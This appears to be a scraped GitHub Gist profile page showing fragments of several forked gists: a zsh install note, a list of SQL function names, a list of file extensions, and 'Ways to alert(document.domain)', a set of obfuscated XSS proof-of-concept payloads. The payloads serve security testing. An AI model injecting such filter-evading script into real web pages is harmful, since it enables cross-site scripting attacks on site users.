Skip to content

Instantly share code, notes, and snippets.

Oh my zsh.

Oh My Zsh

Install ZSH.

sudo apt install zsh-autosuggestions zsh-syntax-highlighting zsh

Install Oh my ZSH.

@Gastony
Gastony / sql-functions.txt
Created August 22, 2024 08:38 — forked from sijad/sql-functions.txt
list of sql functions
ABBREV
ABORT
ABS
ACOS
ADDDATE
ADDMONTHS
ADDTIME
ADD_MONTHS
ADMINPACK
ADVISORYLOCK
@Gastony
Gastony / alert.js
Created August 8, 2023 06:46 — forked from tomnomnom/alert.js
Ways to alert(document.domain)
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);
.php
.html
.txt
.htm
.aspx
.asp
.js
.css
.pgsql.txt
.mysql.txt